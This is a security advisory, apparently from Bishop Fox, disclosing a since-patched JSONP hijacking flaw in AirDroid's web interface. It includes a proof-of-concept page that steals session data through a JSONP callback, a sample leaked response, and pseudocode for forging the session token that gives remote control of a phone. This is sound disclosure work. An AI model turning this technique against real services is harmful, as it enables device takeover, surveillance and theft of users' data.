Release Date
April 15, 2015
Patch Date
March 2015
Reported Date
February 27, 2015 – Submitted to AirDroid
Vendor
AirDroid/Sand Studio/TongBu Networks
Systems Affected
None. Vulnerability patched as of March 2015.
Summary
AirDroid Version 3.0.4 and earlier versions' web applications use JSON with padding (JSONP) for performing cross-origin requests. Due to JSONP being an insecure method of sharing data across origins, it is possible to hijack all of the AirDroid application functionality. By doing this, other users’ Android devices can be hijacked.
Vendor Status
AirDroid has been made aware of the issue and has pushed a patch to the web interface.
Exploit Availability
We created an exploit to demonstrate the severity of this particular vulnerability. It works as follows:
1. Construct a malicious page that sources the following JSONP endpoint:
<!DOCTYPE html> <body> <script> function _callhack( stolen_data ) { alert( JSON.stringify( stolen_data ) ); } </script> <script src="https://id.airdroid.com/p9/user/signIn.html?callback=_callhack"></script></body>
2. Lure an authenticated AirDroid user to the malicious page created in 1. This will result in the sourcing of the JSONP endpoint above, using the victim user’s active AirDroid web session, and the response will contain the information needed to generate a valid 7bb session token. A sample response is given below:
_callhack({"code":"1","result":{"id":"2960728","nickname":"mandatory","mail":"mandatory@[REDACTED]","create_date":"2013-11-27 03:01:58","data_flow_total":"0","vip":"0","vip_starttime":null,"vip_endtime":null,"from_type":"","read_new":"1","mail_verify":"1","pay_type":"0","isPremium":-1,"has_device":"1","device":[{"id":"2800627","name":"","deviceId":"182bed78cde24b3aa9458b[REDACTED]","channelToken":"ae089b0a0a0d[REDACTED]","logicKey":"7530f7bd7149c7c57a5[REDACTED]","manu":"samsung","model":"SM-N900V","model_pic":"http://img.airdroid.com/devices//samsung/Samsung Note 3","osVersion":"4.3","sdkApiLevel":"18","netOpts":{"ip":"[REDACTED]","port":8888,"socket_port":8889,"ssl_port":8890,"usewifi":"true"},"appVer":"67","is_default":"0","imsi":"311480[REDACTED]","create_date":"2014-08-23 22:37:18"}],"app_last_modify":"1415991234"},"msg":"success!"})
3. Using the above information, a valid 7bb session token can be generated. The follow pseudocode shows the process for creating said token:
bb = UNIX_TIMESTAMP + md5(UNIX_TIMESTAMP + DEVICE_ID + LOGIC_KEY)
Vulnerability Details
This authentication flaw allows remote control of other users’ Android phones.
• SMS: send and receive individual or group messages.
• Apps: Import and export .apk files.
• Files: Manage files on Android and transferring files between Android and computer.
• Photos: View and manage photos on Android and transferring photos between Android and computer.
• Music & Videos: Play and manage music & videos on Android and transferring them between Android and computer.
• Ringtones: Set music as ringtone and export any ringtone.
• Contacts: View and edit all the contacts.
• Screenshot: View the real-time screen of Android devices, take static screenshots. (root required)
• Camera: See through the lens of both front and back camera, also supports flashlight.
• URL: Push URL to Android and open automatically open it with Android browser.
• Clipboard: Share clipboard content between Android and computer.
• GPS: Track the mobile device’s location.
Researcher
Matt Bryant of Bishop Fox
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.